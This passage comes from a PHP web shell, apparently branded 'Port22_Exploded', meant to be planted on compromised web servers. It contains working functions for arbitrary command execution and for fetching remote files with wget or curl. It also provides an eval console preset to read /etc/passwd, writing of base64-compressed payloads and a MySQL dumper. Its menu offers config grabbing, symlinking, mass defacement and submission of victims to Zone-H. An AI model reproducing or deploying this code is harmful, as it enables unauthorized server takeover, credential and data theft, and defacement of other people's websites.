513 return $buff;
514}
515
516function ukuran($file){
517 if($size = @filesize($file)){
518 if($size <= 1024) return $size;
519 else{
520 if($size <= 1024*1024) {
521 $size = @round($size / 1024,2);;
522 return "$size kb";
523 }
524 else {
525 $size = @round($size / 1024 / 1024,2);
526 return "$size mb";
527 }
528 }
529 }
530 else return "???";
531}
532
533function exe($cmd){
534 if(function_exists('system')) {
535 @ob_start();
536 @system($cmd);
537 $buff = @ob_get_contents();
538 @ob_end_clean();
539 return $buff;
540 }
541 elseif(function_exists('exec')) {
542 @exec($cmd,$results);
543 $buff = "";
544 foreach($results as $result){
545 $buff .= $result;
546 }
547 return $buff;
548 }
549 elseif(function_exists('passthru')) {
550 @ob_start();
551 @passthru($cmd);
552 $buff = @ob_get_contents();
553 @ob_end_clean();
554 return $buff;
555 }
556 elseif(function_exists('shell_exec')){
557 $buff = @shell_exec($cmd);
558 return $buff;
559 }
560}
561
562function tulis($file,$text){
563 $textz = gzinflate(base64_decode($text));
564 if($filez = @fopen($file,"w"))
565 {
566 @fputs($filez,$textz);
567 @fclose($file);
568 }
569}
570
571function ambil($link,$file) {
572 if($fp = @fopen($link,"r")){
573 while(!feof($fp)) {
574 $cont.= @fread($fp,1024);
575 }
576 @fclose($fp);
577 $fp2 = @fopen($file,"w");
578 @fwrite($fp2,$cont);
579 @fclose($fp2);
580 }
581}
582
583function which($pr){
584 $path = exe("which $pr");
585 if(!empty($path)) { return trim($path); } else { return trim($pr); }
586}
587
588function download($cmd,$url){
589 $namafile = basename($url);
590 switch($cmd) {
591 case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;
592 case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;
593 case 'wfread' : ambil($wurl,$namafile);break;
594 case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
595 case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
596 case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
597 case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
598 default: break;
599 }
600 return $namafile;
601}
602
603function get_perms($file)
604{
605 if($mode=@fileperms($file)){
606 $perms='';
607 $perms .= ($mode & 00400) ? 'r' : '-';
608 $perms .= ($mode & 00200) ? 'w' : '-';
609 $perms .= ($mode & 00100) ? 'x' : '-';
610 $perms .= ($mode & 00040) ? 'r' : '-';
611 $perms .= ($mode & 00020) ? 'w' : '-';
612 $perms .= ($mode & 00010) ? 'x' : '-';
613 $perms .= ($mode & 00004) ? 'r' : '-';
614 $perms .= ($mode & 00002) ? 'w' : '-';
615 $perms .= ($mode & 00001) ? 'x' : '-';
616 return $perms;
617 }
618 else return "??????????";
619}
620
621function clearspace($text){
622 return str_replace(" ","_",$text);
623}
624
625
626?>
627<html><head><link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg"><title><?=$title ?> <?=$versi ?></title>
628<script type="text/javascript">
629function tukar(lama,baru){
630 document.getElementById(lama).style.display = 'none';
631 document.getElementById(baru).style.display = 'block';
632}
633</script><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
634<style type="text/css">
635body { background-color:transparan;background:#000;background-image: url("<?=$background; ?>");background-position: center; background-attachment: fixed;background-repeat: no-repeat; }
636a {text-decoration:none;
637}
638a:hover{
639border-bottom:1px solid #00ff00;
640}
641*{
642 font-size:11px;
643 font-family:Tahoma,Verdana,Arial;
644 color:<?=$color; ?>;
645}
646#menu{
647 background-color:transparan;
648 margin:8px 2px 4px 2px;
649}
650
651#menu a{
652 padding:4px 18px;
653 margin:0;
654 background:#222222;
655 text-decoration:none;
656 letter-spacing:2px;
657 -moz-border-radius: 5px; -moz-box-shadow-webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
658}
659#menu a:hover{
660 background:#191919;
661 border-bottom:1px solid #333333;
662 border-top:1px solid #333333;
663}
664
665.tabnet{
666 margin:15px auto 0 auto;
667 border: 1px solid #333333;
668 color: #FFCC00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;}
669.msupiani{ font-family:Vivaldi;font-size:50px;color: #00FF00;}
670.tabnet{
671 margin:15px auto 0 auto;
672 border: 1px solid #333333; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
673}
674.main {
675 width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
676}
677.gaya {
678 color: $color;
679}
680.inputz{
681 background:#111111;
682 border:0;
683 padding:2px;
684 border-bottom:1px solid #222222;
685 border-top:1px solid #222222; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
686}
687.inputzbut{
688 background:#111111;
689 color:<?=$color; ?>;
690 margin:0 4px;
691 border:1px solid #444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
692
693}
694.inputz:hover, .inputzbut:hover{
695 border-bottom:1px solid #00ff00;
696 border-top:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
697}
698.output {
699 margin:auto;
700 border:1px solid <?=$color; ?>;
701 width:100%;
702 height:400px;
703 background:#000000;
704 padding:0 2px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
705}
706.cmdbox{
707 width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
708}
709.head_info{
710 padding: 0 4px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
711}
712.exploded{
713 font-size:30px;
714 padding:0;
715 color:#444444; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
716}
717.exploded_tbl{
718 text-align:center;
719 margin:0 4px 0 0;
720 padding:0 4px 0 0;
721 border-right:1px solid #333333;
722}
723.phpinfo table{
724 width:100%;
725 padding:0 0 0 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
726}
727.phpinfo td{
728 background:#111111;
729 color:#cccccc;
730padding:6px 8px;; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
731}
732.phpinfo th, th{
733 background:#191919;
734 border-bottom:1px solid #333333;
735font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
736}
737.phpinfo h2, .phpinfo h2 a{
738 text-align:center;
739 font-size:16px;
740 padding:0;
741 margin:30px 0 0 0;
742 background:#222222;
743 padding:4px 0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
744}
745.explore{
746width:100%; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
747}
748.explore a {
749text-decoration:none;
750}
751.explore td{
752border-bottom:1px solid #333333;
753padding:0 8px;
754line-height:24px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
755}
756.explore th{
757padding:3px 8px;
758font-weight:normal; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
759}
760.explore th:hover , .phpinfo th:hover{
761border-bottom:1px solid #00ff00; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
762}
763.explore tr:hover{
764background:#111111; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
765}
766.viewfile{
767background:#EDECEB;
768color:#000000;
769margin:4px 2px;
770padding:8px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
771}
772.sembunyi{
773display:none;
774padding:0;margin:0; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ;
775}
776.jaya{ margin:5px; text-align:right; <?=$color; ?>;}
777.footer{ background:#111111; width:99%; padding:5px; margin:10px auto 5px; text-align:center; font-size:13px; -moz-border-radius: 5px; -moz-box-shadow:0px 0px 10px <?=$color; ?>; -webkit-box-shadow:0px 0px 5px ; }
778.footer a{ font-size:14px; }
779.footer span{ font-size:14px;}
780</style></head>
781
782<body onLoad="document.getElementById('cmd').focus();">
783<!-- logout start here -->
784<div id="menu"><span style='float:right;'><br>
785<?="Time On Server : <b> ".date("d M Y H:i:s",time())."</b>"; ?> <br><br>        
786<a href="?<?="y=".$pwd; ?>&x=kill" title='Remove Shell'>Remove</a>
787 |
788<a href="?<?="y=".$pwd; ?>&x=logout" title='Logout'>Logout</a>       <br><br>
789                          <a href="?<?="y=".$pwd; ?>&x=about" title='About Author'>About</a>
790</span></div>
791<!-- logout end here -->
792<div class="main">
793<!-- head info start here -->
794<div class="head_info">
795<table><tr>
796<td><table class="inputz"><tr><td><a href="" target="blank" onClick="location.reload();"><span class="F0ku5"><img src='<?=$logo; ?>' title="Security Exploded" width="150" height="150"></span></span></a></td></tr><tr><td>
797<a href="http://twitter.com/Port22_Exploded" class="twitter-follow-button" data-show-count="false"> Follow @Port22_Exploded</a>
798<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'http';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script></td></tr></table></td>
799<td><?=$buff; ?></td>
800</tr></table></div>
801<!-- head info end here -->
802<!-- menu start --><br>
803<center><div id="menu">
804<a href="?"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=' height="18" width="34" title='Home '></a>
805<a href="?<?="y=".$pwd; ?>" title='File Explorer'>Files</a>
806<a href="?<?="y=".$pwd; ?>&x=upload" title='Upload File'>Uploader</a>
807<a href="?<?="y=".$pwd; ?>&x=sql" title='Connect To Database'>MySQL Manager</a><br><br>
808<a href="?<?="y=".$pwd; ?>&x=jumping" title='Jumping'>Jumper</a>
809<a href="?<?="y=".$pwd; ?>&x=symlink" title='Symlink'>Multi Symlinker</a>
810<a href="?<?="y=".$pwd; ?>&x=grabc" title='Config Grabber'>Config Grabber</a><br><br>
811<a href="?<?="y=".$pwd; ?>&x=mass" title='Deface To All Folder'>Mass Directory Defacer</a>
812<a href="?<?="y=".$pwd; ?>&x=zone" title='Submit Victim To Zone-H'>Zone-H Submiter</a>
813</div></center><br>
814<!-- menu end -->
815<?php
816@ini_set('display_errors', 0);
817@ini_set('output_buffering',0);
818
819if(isset($_GET['x']) && ($_GET['x'] == 'kill')) {
820
821 echo "
822<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
823
824 <tr>
825 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
826 <center><b><font size=5 style=italic color=#00ff00>Shell Killer</font></b></center></td></tr></table>
827";
828
829echo '<center><br><font style="color:<?=$color; ?>">Do You Really Want To Delete This Shell ?</b></center><br>';
830?>
831<center>
832<div id="menu">
833<a href="?<?="y=".$pwd;?>&x=killit" title='Remove Shell' >Yes, I Want</font></a>
834<a href="<?=$_SERVER['PHP_SELF']; ?>">Cancel</a></b></center><br><br>
835</div>
836<?php
837}
838if(isset($_GET['x']) && ($_GET['x'] == 'killit')) {
839$file = $_SERVER['PHP_SELF'];
840if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
841die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Shell Has Been Killed... Take Care And Stay Safe</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
842else
843echo '<font color="#fff600" size="2pt">Unlink Error !</font>';
844
845}
846/////////////////////////////
847elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
848{
849@ini_set('output_buffering',0);
850echo "
851<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
852
853 <tr>
854 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
855 <center><b><font size=5 style=italic color=#00ff00>Eval</font></b></center></td></tr></table>
856";
857 ?>
858
859<form action="?y=<?=$pwd; ?>&x=php" method="post">
860<table class="tabnet" style="width:800px;height:300px">
861<tr><td>
862<textarea class="output" name="cmd" id="cmd">
863<?php
864if(isset($_POST['submitcmd'])) {
865 echo eval(magicboom($_POST['cmd']));
866}
867else echo "echo file_get_contents('/etc/passwd');";
868?>
869</textarea>
870<tr><td><input style="width:800px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
871</table>
872</form>
873
874<?php }
875
876/////////////////////////////
877///////////////////////////////////////////////////////////////////////////////
878elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')){
879 echo "
880<table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
881
882 <tr>
883 <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
884 <center><b><font size=5 style=italic color=#00ff00>MySQL Manager</font></b></center></td></tr></table>
885";
886function view_size($size) {
887 if (!is_numeric($size)) { return FALSE; }
888 else {
889if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
890elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
891elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
892else {$size = $size . " B";}
893return $size;
894 }
895}
896function mysql_dump($set) {
897 $sock = $set["sock"];
898 $db = $set["db"];
899 $print = $set["print"];
900 $nl2br = $set["nl2br"];
901 $file = $set["file"];
902 $add_drop = $set["add_drop"];
903 $tabs = $set["tabs"];
904 $onlytabs = $set["onlytabs"];
905 $ret = array();
906 $ret["err"] = array();
907 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
908 if (empty($db)) {$db = "db";}
909 if (empty($print)) {$print = 0;}
910 if (empty($nl2br)) {$nl2br = 0;}
911 if (empty($add_drop)) {$add_drop = TRUE;}
912 if (empty($file)) {
913$file = $tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
914 }
915 if (!is_array($tabs)) {$tabs = array();}
916 if (empty($add_drop)) {$add_drop = TRUE;}
917 if (sizeof($tabs) == 0) {
918$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
919if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
920 }
921 $out = "
922 # Dumped By ".$xName."
923 # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
924 # Date: ".date("d.m.Y H:i:s")."
925 # DB: \"".$db."\"
926 #---------------------------------------------------------";
927 $c = count($onlytabs);
928 foreach($tabs as $tab) {
929if ((in_array($tab,$onlytabs)) or (!$c)) {
930 if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
931 $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
932 if (!$res) {$ret["err"][] = mysql_smarterror();}
933 else {
934$row = mysql_fetch_row($res);
935$out .= $row["1"].";\n\n";
936$res = mysql_query("SELECT * FROM `$tab`", $sock);
937if (mysql_num_rows($res) > 0) {
938 while ($row = mysql_fetch_assoc($res)) {
939$keys = implode("`, `", array_keys($row));
940$values = array_values($row);
941foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
942$values = implode("', '", $values);
943$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
944$out .= $sql;
945 }
946}
947 }
948}
949 }
950 $out .= "#---------------------------------------------------------------------------------\n\n";
951 if ($file) {
952$fp = fopen($file, "w");
953if (!$fp) {$ret["err"][] = 2;}
954else {
955 fwrite ($fp, $out);
956 fclose ($fp);
957}
958 }
959 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
960 return $out;
961}
962function mysql_buildwhere($array,$sep=" and",$functs=array()) {
963 if (!is_array($array)) {$array = array();}
964 $result = "";
965 foreach($array as $k=>$v) {
966$value = "";
967if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
968$value .= "'".addslashes($v)."'";
969if (!empty($functs[$k])) {$value .= ")";}
970$result .= "`".$k."` = ".$value.$sep;
971 }
972 $result = substr($result,0,strlen($result)-strlen($sep));
973 return $result;
974}
975function mysql_fetch_all($query,$sock) {
976 if ($sock) {$result = mysql_query($query,$sock);}
977 else {$result = mysql_query($query);}
978 $array = array();
979 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
980 mysql_free_result($result);
981 return $array;
982}
983function mysql_smarterror($sock) {
984 if ($sock) { $error = mysql_error($sock); }
985 else { $error = mysql_error(); }
986 $error = htmlspecialchars($error);
987 return $error;
988}
989function mysql_query_form() {
990 global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
991 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
992 if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
993 if ((!$submit) or ($sql_x)) {
994echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
995if ($tbl_struct) {
996 echo "<td valign=\"top\"><b>Fields:</b><br>";
997 foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
998 echo "</td></tr></table>";
999}
1000 }
1001 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
1002}
1003function mysql_create_db($db,$sock="") {
1004 $sql = "CREATE DATABASE `".addslashes($db)."`;";
1005 if ($sock) {return mysql_query($sql,$sock);}
1006 else {return mysql_query($sql);}
1007}
1008function mysql_query_parse($query) {
1009 $query = trim($query);
1010 $arr = explode (" ",$query);
1011 $types = array(
1012"SELECT"=>array(3,1),
1013"SHOW"=>array(2,1),
1014"DELETE"=>array(1),
1015"DROP"=>array(1)
1016 );
1017 $result = array();
1018 $op = strtoupper($arr[0]);
1019 if (is_array($types[$op])) {
1020$result["propertions"] = $types[$op];
1021$result["query"] = $query;
1022if ($types[$op] == 2) {
1023 foreach($arr as $k=>$v) {
1024if (strtoupper($v) == "LIMIT") {
1025 $result["limit"] = $arr[$k+1];
1026 $result["limit"] = explode(",",$result["limit"]);
1027 if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
1028 unset($arr[$k],$arr[$k+1]);
1029}
1030 }
1031}
1032 }
1033 else { return FALSE; }
1034}
1035function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
1036function html_style() {
1037$style = ' <style type="text/css"> a { text-decoration:none; } a:hover { color: #00ff00; border-bottom:1px solid #00ff00; } input[type="text"], input[type="password"], select{ background:#111111; border:0; padding:2px; border:1px solid #444444; } input[type="submit"]{ background:#111111; color:#ffffff; margin:0 4px; border:1px solid #444444;} input[type="text"]:hover, input[type="submit"]:hover, input[type="password"]:hover, select:hover{ border-bottom:1px solid #00ff00;border-top:1px solid #00ff00;} .tab { width:100%; } th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .tub { width:100%; } .tub th{ border-bottom:1px solid #00ff00; padding:3px;} .tub tr:hover{ background:#006400; } .tub td{ border-bottom:1px solid #333333; padding-left:3px; } #maininfo { padding:5px; margin-top:10px; margin-left:2px; margin-right:2px; background:#191919; } #maininfo a{ color:#00ff00; } textarea { background:#000000; border:1px solid #444444;} textarea:hover { border:1px solid #00ff00;} </style><center>';
1038return $style;
1039}
1040$auto_surl = TRUE;
1041foreach ($_REQUEST as $k => $v) {
1042 if (!isset($$k)) { $$k = $v; }
1043}
1044if ($auto_surl) {
1045 $include = "&";
1046 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
1047$v= explode("=",$v);
1048$name= urldecode($v[0]);
1049$value= @urldecode($v[1]);
1050$needles = array("http://","https://","ssl://","ftp://","\\\\");
1051foreach ($needles as $needle) {
1052 if (strpos($value,$needle) === 0) {
1053$includestr .= urlencode($name)."=".urlencode($value)."&";
1054 } } } }
1055if (empty($surl)) { $surl = htmlspecialchars("?".@$includestr); }
1056if (!isset($x)) { $x = "sql"; }
1057 if ($x == "sql") {
1058 foreach (array("sort","sql_sort") as $v) {
1059if (!empty($_GET[$v])) { $$v = $_GET[$v]; }
1060if (!empty($_POST[$v])) { $$v = $_POST[$v]; }
1061 }
1062 if ($sort_save) {
1063if (!empty($sort)) { setcookie("sort",$sort); }
1064if (!empty($sql_sort)) { setcookie("sql_sort",$sql_sort); }
1065 }
1066 if (!isset($sort)) { $sort = $sort_default; }
1067 $sort = htmlspecialchars($sort);
1068 $sort[1] = strtolower($sort[1]);
1069 echo html_style();
1070echo "<div id='maininfo'>";
1071 if ($x == "sql") {
1072 $sql_surl = $surl."x=sql";
1073 if (!isset($sql_login)) { $sql_login = ""; }
1074 if (!isset($sql_passwd)) { $sql_passwd = ""; }
1075 if (!isset($sql_server)) { $sql_server = ""; }
1076 if (!isset($sql_port)) { $sql_port = ""; }
1077 if (!isset($sql_tbl)) { $sql_tbl = ""; }
1078 if (!isset($sql_x)) { $sql_x = ""; }
1079 if (!isset($sql_tbl_x)) { $sql_tbl_x = ""; }
1080 if (!isset($sql_order)) { $sql_order = ""; }
1081 if (!isset($sql_x)) { $sql_x = ""; }
1082 if (!isset($sql_getfile)) { $sql_getfile = ""; }
1083 if (@$sql_login) { $sql_surl .= "&sql_login=".htmlspecialchars($sql_login); }
1084 if (@$sql_passwd) { $sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd); }
1085 if (@$sql_server) { $sql_surl .= "&sql_server=".htmlspecialchars($sql_server); }
1086 if (@$sql_port){ $sql_surl .= "&sql_port=".htmlspecialchars($sql_port); }
1087 if (@$sql_db) { $sql_surl .= "&sql_db=".htmlspecialchars($sql_db); }
1088 $sql_surl .= "&";
1089 echo "";
1090 if (@$sql_server) {
1091$sql_sock = @mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
1092$err = mysql_smarterror($sql_sock);
1093@mysql_select_db($sql_db,$sql_sock);
1094if (@$sql_query and $submit) {
1095 $sql_query_result = mysql_query($sql_query,$sql_sock);
1096 $sql_query_error = mysql_smarterror($sql_sock);
1097}
1098 }
1099 else { $sql_sock = FALSE; }
1100 if (!$sql_sock) {
1101if (!@$sql_server) { echo "<blink><b><font style= color:#ff0000>No Connection ! ! !</font></b></blink>"; }
1102else { disp_error("ERROR: ".$err); }
1103 }
1104 else {
1105#SQL Quicklaunch
1106$sqlquicklaunch= array();
1107$sqlquicklaunch[] = array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
1108$sqlquicklaunch[] = array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
1109$sqlquicklaunch[] = array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
1110$sqlquicklaunch[] = array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
1111$sqlquicklaunch[] = array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
1112$sqlquicklaunch[] = array("Logout",$surl."x=sql");
1113echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
1114if (count($sqlquicklaunch) > 0) {
1115 foreach($sqlquicklaunch as $item) {
1116echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1117 }
1118 }
1119 }
1120echo "</div>";
1121echo "<center><table class='tab'><tr>";
1122 if (!$sql_sock) {
1123 echo '<td>
1124<form name="f_sql" action="'.$surl.'x=sql" method="POST">
1125<input type="hidden" name="x" value="sql">
1126<table class="tabnet" style="padding:1px;">
1127<tr><th colspan="2"><b>MySQL Manager</b></th></tr>
1128<tr><td>Host</td><td><input type="text" name="sql_server" class="inputz" style="width:249px;background:black" value="localhost"></td></tr>
1129<tr><td>Username</td><td><input type="text" name="sql_login" class="inputz" value="" style="width:249px;background:black"></td></tr>
1130<tr><td>Password</td><td><input type="password" name="sql_passwd" class="inputz" value="" style="width:249px;background:black;"></td></tr>
1131<tr><td>Database</td><td><input type="text" name="sql_db" value="" class="inputz" style="width:249px;background:black"></td></tr>
1132<tr><td>Port</td><td><input type="text" name="sql_port" class="inputz" value="3306" style="background:black;" size="6"> <input type="submit" class="inputzbut" style=color:$color value="Connect"></td></tr>
1133</table>
1134</form>';
1135 }
1136 else {
1137 echo '<td valign="top" style="border:1px solid #333333;">
1138<center>
1139<a href="'.$sql_surl.'"><b style="color:#00ff00;">HOME</b></a>
1140<hr size="1" noshade>';
1141 $result = mysql_list_dbs($sql_sock);
1142 if (!$result) { echo mysql_smarterror(); }
1143 else {
1144 echo '<form action="'.$surl.'x=sql">
1145<input type="hidden" name="x" value="sql">
1146<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1147<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1148<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1149<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1150<select name="sql_db" onchange="this.form.submit()" style="width:100%;">';
1151$c = 0;
1152$dbs = "";
1153while ($row = mysql_fetch_row($result)) {
1154 $dbs .= "\t\t<option value=\"".$row[0]."\"";
1155 if (@$sql_db == $row[0]) { $dbs .= " selected"; }
1156 $dbs .= ">".$row[0]."</option>\n";
1157 $c++;
1158}
1159echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
1160echo $dbs;
1161 }
1162echo '</select>
1163<hr size="1" noshade>
1164</form>
1165</center>';
1166if (isset($sql_db)) {
1167 $result = mysql_list_tables($sql_db);
1168 if (!$result) {
1169$result = mysql_list_dbs($sql_sock);
1170$num = mysql_num_rows($result);
1171for( $i = 0; $i < $num; $i++ ) {
1172$dbname = mysql_dbname( $result, $i );
